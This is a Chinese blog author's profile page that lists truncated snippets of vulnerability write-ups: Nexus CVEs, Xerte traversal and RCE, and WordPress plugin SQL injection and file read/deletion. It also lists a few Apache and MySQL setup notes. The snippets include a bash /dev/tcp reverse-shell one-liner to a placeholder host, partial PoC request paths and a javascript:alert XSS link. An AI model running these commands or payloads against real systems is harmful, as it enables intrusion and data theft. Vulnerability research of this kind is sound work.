Billie_f310 - 简书

发简信

0
关注
3
粉丝
18
文章
6029

字数
2

收获喜欢
0

总资产

IP属地：浙江

Billie_f310

PHP最高效的weshell反弹方式！（针对各种无回显）
如果你拿到了webshell！！！！！如果你还在用传统写法 /bin/bash -i >& /dev/tcp/x.x.x.x/9090 0>&1 无回显感到烦恼时如果你能...

965 0 0
Billie_f310

Codeql进阶源码分析之Java代码漏扫模块1.1（XXE漏洞CWE-601）
写在最前面在看这一坨的时候，你首先要具备2个要素，第一你知道这个漏洞是如何产生和如何规避。第二这一系列的分析都是都是基于官方的dll库分析，前提是你已经了解了Codeq...

1482 0 1

Billie_f310

CVE-2019-7238分析，Nexus Repository Manager 3
介绍：Nexus Repository Manager是一个maven管理功能系统影响版本：Nexus Repository Manager up to 3.13 漏洞类型...

1144 0 0
Billie_f310

CVE-2020-10199分析，Nexus Repository Manager
介绍：Nexus Repository Manager是一个maven管理功能系统影响版本：Nexus Repository Manager up to 3.21 漏洞类型...

477 0 0
Billie_f310

如何使用IDEA远程调试Sonatype Nexus Repository Manager
1、Docker运行起来NRM（Sonatype Nexus Repository Manager） docker pull sonatype/nexus3:3.21.0（拉...

820 0 0
Billie_f310

Xerte 3.10.3 - Directory Traversal (Authenticated)
很简单的绕过。 http://127.0.0.1:8081/xerteonlinetoolkits-3.8.5-33/getfile.php?file=1-guest2-1/...

268 0 0
Billie_f310

Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)
很有想法的漏洞

385 0 0

Billie_f310

CVE-2022–21661 WordPress 《=5.3, 携带WP_QUERY插件SQL注入
POC：http://127.0.0.1:8081/wordpress-5.8.1-zh_CN/wordpress/wp-admin/admin-ajax.php POST ...

1545 0 0
Billie_f310

WordPress Plugin Modern Events Calendar V 6.1 - SQL Injection (Unauthenticated)
接收参数的过滤方法并不能去除 select sleep等函数。time处理有问题 http://127.0.0.1:8081/wordpress-5.8.1-zh_CN/wo...

218 0 0
Billie_f310

Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection
esc_sql() 有问题 orderby无法过滤

163 0 0
Billie_f310

# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
/wordpress-5.8.1-zh_CN/wordpress/wp-admin/admin-ajax.php?action=duplicator_download&fil...

289 0 0
Billie_f310

WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion
plugins get Arbitrary File Deletion() POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1H...

209 0 0

Billie_f310

Apache .htaccess <ifModule在这里不允许
在我的Apache.conf中添加： <Directory/>AllowOverrideALL</Directory>

389 0 0
Billie_f310

apache 目录访问不到
一：禁止 Apache 显示目录结构列表，只需将 Option 中的 Indexes 去掉即可。删除index.html必须！！！！！比如我们看看一个目录的目录配置： Op...

623 0 0
Billie_f310

Mac系统下Xdebug模块在phpinfo()不显示的解决方案！
1这个问题困惑了我很久，全世界都搜不到能解决我的问题的答案，如果此答案可以帮到你们，那是你们的荣幸！因为我肯定能解决你们的问题，当然我是苹果系统，其他系统出现此情况的可能性比...

894 0 1
Billie_f310

mysql5.6报错显示丢失mysql.sock在mac上BIg sur版本
1 mysql5.6系列在最新的mac big sur版本上有很多诡异问题。比如var/lib/mysql 在安装初期并未创建。/temp下的mysql.sock也没有创建。...

400 0 0
Billie_f310

2021-04-16
你是一个很好的人帅哥[https://www.jianshu.com/go-wild?ac=2&url=javascript:alert(3)]

105 0 0

Billie_f310

centos下安装golang环境
一直使用windows作为开发环境。现在尝试一下使用腾讯云服务器的centos7.5的linxu云服务器搭建golang环境第一步在golang中文社区的下载中获取地址：...

Selv
12254 1 7

个人介绍

大家好！我是Billie擅长手动分析各种漏洞！这里只会分析漏洞产生的原理！喜欢就关注吧！粉丝超过1000公布简书的0day！